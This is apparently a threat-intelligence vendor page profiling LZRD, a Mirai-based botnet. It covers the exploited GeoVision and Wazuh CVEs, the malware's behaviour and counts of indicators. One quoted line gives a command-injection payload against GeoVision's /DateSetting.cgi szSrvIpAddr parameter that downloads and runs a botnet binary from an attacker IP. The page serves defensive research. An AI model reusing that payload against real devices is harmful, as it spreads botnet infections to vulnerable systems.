LZRD is a Mirai-based botnet malware variant used to compromise internet-exposed embedded devices and conscript them into distributed denial-of-service infrastructure. It has been observed targeting vulnerable IoT equipment through unauthenticated remote command-injection and related exploitation of known flaws in exposed services, including retired or unpatched devices. Reported activity includes exploitation attempts against GeoVision devices as well as additional opportunistic targeting of other internet-facing systems and routers associated with previously disclosed vulnerabilities.
The malware follows established Mirai tradecraft. Observed samples download and execute on ARM-based devices, initialize an encoded configuration, connect to a hard-coded command-and-control endpoint, and receive instructions to launch DDoS attacks. Its behavior and embedded attack functions align with Mirai-derived botnet operations rather than data-theft malware. LZRD has also been linked through infrastructure similarities to activity resembling the previously reported InfectedSlurs/TBOTNET ecosystem.
LZRD is part of the broader proliferation of Mirai descendants that continue to exploit insecure IoT devices, especially systems that remain internet-accessible, unsupported, or insufficiently patched. It is primarily associated with botnet formation and remote attack execution against compromised devices.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of command injection vulnerabilities CVE-2024-6047 and CVE-2024-11120 against discontinued GeoVision Internet of Things (IoT) devices. | This exploit downloads and executes a Mirai-based malware variant called LZRD.
The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of command injection vulnerabilities CVE-2024-6047 and CVE-2024-11120 against discontinued GeoVision Internet of Things (IoT) devices. | This exploit downloads and executes a Mirai-based malware variant called LZRD.
A now-patched critical security flaw in the Wazur Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks. Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that allows for remote code execution on Wazuh servers.
4 distinct techniques documented for this family, organized by ATT&CK tactic.
We also observed this botnet attempting to exploit a variety of other vulnerabilities in our honeypots. This includes a hadoop YARN vulnerability, the ZTE ZXV10 H108L Router exploit, CVE-2018-10561, and the DigiEver vulnerability we reported on previously.
The exploit targets the /DateSetting.cgi endpoint in GeoVision IoT devices, and injects commands into the szSrvIpAddr parameter. Certain discontinued GeoVision devices fail to properly filter user input for this parameter, which allows unauthenticated remote attackers to inject and execute arbitrary system commands on a target system. | $( cd /tmp ; wget http://176.65.144[.]253/hiddenbin/boatnet.arm7 ; chmod 777 boatnet.arm7 ; ./boatnet.arm7 geovision ; )
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A botnet listed as using Mirai malware.
LZRD is a Mirai-based botnet variant that uses XOR-encoded configuration and connects to a C2 server to receive DDoS attack commands. It is referenced as similar in operation to ShadowV2.
A Mirai variant delivered after exploitation of vulnerable GeoVision IoT devices; it contains typical Mirai attack functions and hard-coded C2 infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.